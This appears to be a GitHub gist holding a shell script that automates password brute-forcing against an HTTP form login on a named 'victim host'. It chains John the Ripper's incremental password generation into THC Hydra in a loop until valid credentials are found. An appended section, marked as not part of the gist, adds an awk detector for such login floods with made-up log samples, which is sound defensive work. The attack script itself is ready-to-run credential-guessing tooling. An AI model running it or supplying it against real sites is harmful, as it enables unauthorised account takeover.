@intrd
Last active March 3, 2017 06:05
Bruteforcing with THC Hydra + John the ripper on-the-fly (funoverip shellscript reloaded by intrd)
#!/bin/sh
## Bruteforcing with THC Hydra + John the ripper on-the-fly (funoverip script reloaded by intrd)
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
hydra="hydra" # THC Hydra binary
john="john" # John the Ripper binary
hydra_login="null"
hydra_module="http-form-post" # bruteforce type (in this case HTTP)
hydra_module_options="/class.cgi:login&name=^USER^&password=^PASS^&login=Login:Invalid password" # your bruteforce syntax
hydra_host="domain.net" # victim host
hydra_port="80" # victim host port
hydra_nb_task="5" # threads
hydra_all_params="-f -l $hydra_login -t $hydra_nb_task -w 30 -vV -s $hydra_port" # use -e ns for blank passwords
john_sessionfile="$1"
john_all_params="--incremental:Digits --stdout" # your john syntax to generate passwords
john_time_step=10 # time (seconds) to run john
tmp_passwd="/tmp/pwd1234.tmp"
hydra_logfile="/tmp/hydralog"
if [ "$1" = "" ]; then
    echo "Usage: $0 <john session file>"
    exit 1
fi
while true; do
    # generate a batch of passwords with John the Ripper
    echo; echo "- Start (re)generating passwords with John"
    if [ -e "$john_sessionfile.rec" ]; then
        # if the session exists, restore it
        $john --restore="$john_sessionfile" > "$tmp_passwd" &
    else
        # if the session does not exist yet, create it
        $john $john_all_params --session="$john_sessionfile" > "$tmp_passwd" &
    fi
    # wait $john_time_step seconds, then kill john and start hydra on its output
    echo "- Wait ..."
    sleep $john_time_step
    echo "- Kill john"
    killall john 2>/dev/null 1>/dev/null
    sleep 1
    # start hydra tries
    echo; echo "- Start hydra"; echo
    rm -f "$hydra_logfile"
    echo "$hydra $hydra_host $hydra_module \"$hydra_module_options\" -P $tmp_passwd $hydra_all_params | tee -a $hydra_logfile"
    $hydra $hydra_host $hydra_module "$hydra_module_options" -P "$tmp_passwd" $hydra_all_params | tee -a "$hydra_logfile"
    # if a valid pair has been found, stop the loop
    if grep -q valid "$hydra_logfile"; then
        echo; echo "#### YAY! FOUND :) ####"
        exit 0
    fi
done
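
The defender's side of the traffic this script produces, as an added example that is not part of the gist: a per-client, per-minute count of POSTs to the login form in a combined-format web access log. The function name, the threshold and the sample log lines are assumptions constructed for illustration; only the `/class.cgi` path comes from the script above.

```shell
#!/bin/sh
# Added example (not part of the gist). Flags clients that POST to a login
# form more often per minute than a person typing passwords would.

# detect_form_bruteforce PATH THRESHOLD < access.log
# Prints "<ip> <dd/Mon/yyyy:HH:MM> <count>" for every client/minute bucket
# with at least THRESHOLD POST requests to PATH.
detect_form_bruteforce() {
    awk -v path="$1" -v limit="$2" '
        {
            ip = $1
            minute = substr($4, 2, 17)  # "[03/Mar/2017:06:05:01" -> day:HH:MM
            method = substr($6, 2)      # drop the opening quote of the request
            url = $7
            sub(/\?.*/, "", url)        # ignore any query string
            if (method == "POST" && url == path)
                hits[ip " " minute]++
        }
        END {
            for (k in hits)
                if (hits[k] >= limit)
                    print k, hits[k]
        }
    ' | sort
}

# Constructed sample log: one client hammering the form, one ordinary user.
sample_log() {
    cat <<'EOF'
203.0.113.7 - - [03/Mar/2017:06:05:01 +0000] "POST /class.cgi HTTP/1.1" 200 512 "-" "-"
203.0.113.7 - - [03/Mar/2017:06:05:01 +0000] "POST /class.cgi HTTP/1.1" 200 512 "-" "-"
203.0.113.7 - - [03/Mar/2017:06:05:02 +0000] "POST /class.cgi HTTP/1.1" 200 512 "-" "-"
203.0.113.7 - - [03/Mar/2017:06:05:02 +0000] "POST /class.cgi HTTP/1.1" 200 512 "-" "-"
203.0.113.7 - - [03/Mar/2017:06:05:03 +0000] "POST /class.cgi HTTP/1.1" 200 512 "-" "-"
203.0.113.7 - - [03/Mar/2017:06:05:03 +0000] "POST /class.cgi HTTP/1.1" 200 512 "-" "-"
203.0.113.7 - - [03/Mar/2017:06:05:04 +0000] "POST /search.cgi HTTP/1.1" 200 128 "-" "-"
198.51.100.20 - - [03/Mar/2017:06:05:10 +0000] "GET /class.cgi HTTP/1.1" 200 900 "-" "-"
198.51.100.20 - - [03/Mar/2017:06:05:40 +0000] "POST /class.cgi HTTP/1.1" 302 0 "-" "-"
EOF
}

sample_log | detect_form_bruteforce /class.cgi 5
```

A failed form login usually returns HTTP 200 like any other page, so the count is taken on requests to the form rather than on status codes.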